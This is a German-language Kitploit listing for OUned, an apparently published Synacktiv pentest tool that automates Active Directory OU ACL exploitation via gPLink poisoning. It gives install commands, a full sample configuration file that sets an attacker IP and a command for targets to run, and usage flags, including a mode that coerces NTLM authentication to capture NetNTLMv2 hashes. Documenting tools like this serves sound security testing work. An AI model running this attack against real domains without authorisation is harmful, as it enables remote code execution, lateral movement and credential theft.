Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
OUned — The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning | Kitploit
Tools/GitHubGitHub/synacktiv/ouned
Privilege EscalationExploitationLateral MovementPenetration TestingAuthenticationMisconfiguration
GitHubsynacktiv/ouned

OUned

The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning

Repository anzeigen
16114vor 9 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

OUned

Das OUned-Projekt, ein Exploitation-Tool, das den Missbrauch von ACLs Organizational Units durch gPLink-Manipulation automatisiert.

Eine ausführliche Erklärung zum Prinzip hinter dem Angriff, der erforderlichen Einrichtung sowie zur Verwendung des Tools finden Sie im zugehörigen Artikel: https://www.synacktiv.com/publications/ounedpy-exploiting-hidden-organizational-units-acl-attack-vectors-in-active-directory

Installation

Die Installation kann durch Klonen des Repositorys und Installieren der Abhängigkeiten erfolgen:

root@kitploit:~
$ git clone https://github.com/synacktiv/OUned
$ python3 -m pip install -r requirements.txt

Konfigurationsdatei

OUned-Argumente werden über eine Konfigurationsdatei bereitgestellt – eine Beispieldatei befindet sich im Repository, config.example.ini.

Jeder Eintrag ist durch einen Kommentar beschrieben; für detaillierte Konfigurationsanweisungen lesen Sie bitte den oben in der Einleitung erwähnten Artikel.

root@kitploit:~
[GENERAL]
# The target domain name
domain=corp.com

# The target DC. If not specified, defaults to the domain name
#dc=192.168.123.10

# The Distinguished Name of the target container
containerDN=OU=SERVERS,DC=corp,DC=com

# The username and password of the user having write permissions on the gPLink attribute of the target container
username=naugustine
password=Password1

# The IP address of the attacker machine on the internal network
attacker_ip=192.168.123.16

# The command that should be executed by child objects. Specifying a command will inject an immediate Scheduled Task
command=whoami > C:\poc.txt
# Alternatively to the 'command' option, you can provide a module file with the GroupPolicyBackdoor syntax - see https://github.com/synacktiv/GroupPolicyBackdoor/wiki. 'Command' and 'module' are mutually exclusive
# module=Scheduledtask_add_computer.ini

# The kind of objects targeted ("computer" or "user")
target_type=computer


[LDAP]
# The IP address of the dummy domain controller that will act as an LDAP server
ldap_ip=192.168.125.245

# Optional (used for sanity checks) - the hostname of the dummy domain controller
ldap_hostname=WIN-TTEBC5VH747

# The username and password of a domain administrator on the dummy domain controller 
ldap_username=ldapadm
ldap_password=Password1!

# The ID of the GPO (can be empty, only needs to exist) on the dummy domain controller
gpo_id=7B7D6B23-26F8-4E4B-AF23-F9B9005167F6

# The machine account name and password on the target domain that will be used to fake the LDAP server delivering the GPC
ldap_machine_name=OUNED$
ldap_machine_password=some_very_long_random_password

[SMB]
# The SMB mode can be embedded or forwarded depending on the kind of object targeted
smb_mode=embedded

# The name of the SMB share. Can be anything for embedded mode, should match an existing share on SMB dummy domain controller for forwarded mode
share_name=synacktiv

# The IP address of the dummy domain controller that will act as a SMB server. Only useful in forwarded mode
#smb_ip=192.168.126.206

# The username and password of a user having write access to the share on the SMB dummy domain controller. Only useful in forwarded mode
#smb_username=smbadm
#smb_password=Password1!

# The machine account name and password on the target domain that will be used to fake the SMB server delivering the GPT. Only useful in forwarded mode
#smb_machine_name=OUNED2$
#smb_machine_password=some_very_long_random_password

Verwendung von OUned

Das einzige Pflichtargument beim Ausführen von OUned ist das Flag --config, das den Pfad zur Konfigurationsdatei angibt.

Die Flags --just-coerce und coerce-to werden für den SMB-Authentifizierungs-Coercion-Modus verwendet, bei dem OUned SMB-Authentifizierung von OU-Unterobjekten zum angegebenen Ziel erzwingt – weitere Details finden Sie im in der Einleitung verlinkten Artikel.

Bezüglich des --just-clean-Flags siehe den nächsten Abschnitt.

root@kitploit:~
python3 OUned.py --help
                                                                                                                                                                                    
 Usage: OUned.py [OPTIONS]                                                                                                                                                          
                                                                                                                                                                                    
╭─ Options ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ *  --config               TEXT  The configuration file for OUned [default: None] [required]                                                                                      │
│    --skip-checks                Do not perform the various checks related to the exploitation setup                                                                              │
│    --just-coerce                Only coerce SMB NTLM authentication of OU child objects to the destination specified in the --coerce-to flag, or, if no destination is           │
│                                 specified, to a local SMB server that will print their NetNTLMv2 hashes                                                                          │
│    --coerce-to            TEXT  Coerce child objects SMB NTLM authentication to a specific destination - this argument should be an IP address [default: None]                   │
│    --just-clean                 This flag indicates that OUned should only perform cleaning actions from specified cleaning-file                                                 │
│    --cleaning-file        TEXT  The path to the cleaning file in case the --just-clean flag is used [default: None]                                                              │
│    --verbose                    Enable verbose output                                                                                                                            │
│    --help                       Show this message and exit.                                                                                                                      │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

Über die Bereinigung

Standardmäßig führt OUned – wie im Artikel erläutert – Bereinigungsaktionen durch und stellt unter anderem den ursprünglichen gPLink-Wert in der Zieldomäne wieder her. Falls das Exploit nicht ordnungsgemäß beendet werden konnte, erstellt OUned bei jeder Ausführung des Exploits eine Bereinigungsdatei, die später verwendet werden kann, um legitime Werte mithilfe des --just-clean-Flags wiederherzustellen; zum Beispiel:

root@kitploit:~
$ python3 OUned.py --config config.example.ini --just-clean --cleaning-file cleaning/FINANCE/2024_04_14-05_02_46.txt
Tool herunterladen